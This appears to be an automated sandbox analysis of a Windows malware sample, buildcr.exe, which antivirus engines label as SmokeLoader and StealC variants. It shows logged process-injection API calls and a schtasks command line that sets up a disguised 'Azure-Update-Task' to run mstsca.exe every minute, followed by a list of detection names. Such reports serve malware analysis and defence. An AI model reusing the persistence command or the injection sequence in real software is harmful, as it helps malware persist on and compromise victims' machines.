NtAllocateVirtualMemory July 2, 2024, 7:44 a.m.	process_identifier: 3040 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1	0
WriteProcessMemory July 2, 2024, 7:44 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3040 process_handle: 0x00000080	1	1
NtSetContextThread July 2, 2024, 7:44 a.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4201210 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 3040	1	0
NtResumeThread July 2, 2024, 7:44 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 3040	1	0
CreateProcessInternalW July 2, 2024, 7:44 a.m.	thread_identifier: 412 thread_handle: 0x000000ac process_identifier: 2180 current_directory: filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe" filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000b0	1	1

File has been identified by 55 AntiVirus engines on VirusTotal as malicious (50 out of 55 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Agent.Y!c
Elastic	malicious (high confidence)
Cynet	Malicious (score: 100)
CAT-QuickHeal	Backdoor.Agent
Skyhigh	BehavesLike.Win32.Lockbit.cc
ALYac	Trojan.Generic.36486039
Cylance	Unsafe
VIPRE	Trojan.Generic.36486039
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Trojan ( 005b694e1 )
BitDefender	Trojan.Generic.36486039
K7GW	Trojan ( 005b694e1 )
Arcabit	Trojan.Generic.D22CBB97
Symantec	ML.Attribute.HighConfidence
tehtris	Generic.Malware
ESET-NOD32	a variant of Win32/Kryptik.HXJY
APEX	Malicious
McAfee	Artemis!88932AB33C38
Avast	Win32:BootkitX-gen [Rtk]
Kaspersky	HEUR:Trojan.Win32.Strab.gen
Alibaba	Trojan:Win32/Generic.c403e1da
MicroWorld-eScan	Trojan.Generic.36486039
Rising	Backdoor.Agent!8.C5D (CLOUD)
Emsisoft	Trojan.Generic.36486039 (B)
TrendMicro	Trojan.Win32.SMOKELOADER.YXEF2Z
McAfeeD	Real Protect-LS!88932AB33C38
Trapmine	malicious.moderate.ml.score
FireEye	Generic.mg.88932ab33c380729
Sophos	Troj/Krypt-AEE
Ikarus	Trojan.Win32.Crypt
Webroot	W32.Trojan.Gen
Google	Detected
MAX	malware (ai score=81)
Antiy-AVL	Trojan/Win32.Kryptik
Kingsoft	malware.kb.a.1000
Gridinsoft	Trojan.Win32.Agent.sa
Xcitium	Malware@#3d11euvqed7s1
Microsoft	Trojan:Win32/StealC.GND!MTB
ZoneAlarm	HEUR:Trojan.Win32.Strab.gen
GData	Win32.Trojan.PSE.19KREOO
Varist	W32/Trojan.FWF.gen!Eldorado
BitDefenderTheta	Gen:NN.ZexaF.36808.Yq0@aiN8SzoG
DeepInstinct	MALICIOUS
VBA32	BScope.Trojan.Convagent
Malwarebytes	Trojan.MalPack.GS
Panda	Trj/GdSda.A
TrendMicro-HouseCall	Trojan.Win32.SMOKELOADER.YXEF2Z
SentinelOne	Static AI - Malicious PE
MaxSecure	Trojan.Malware.300983.susgen

buildcr.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All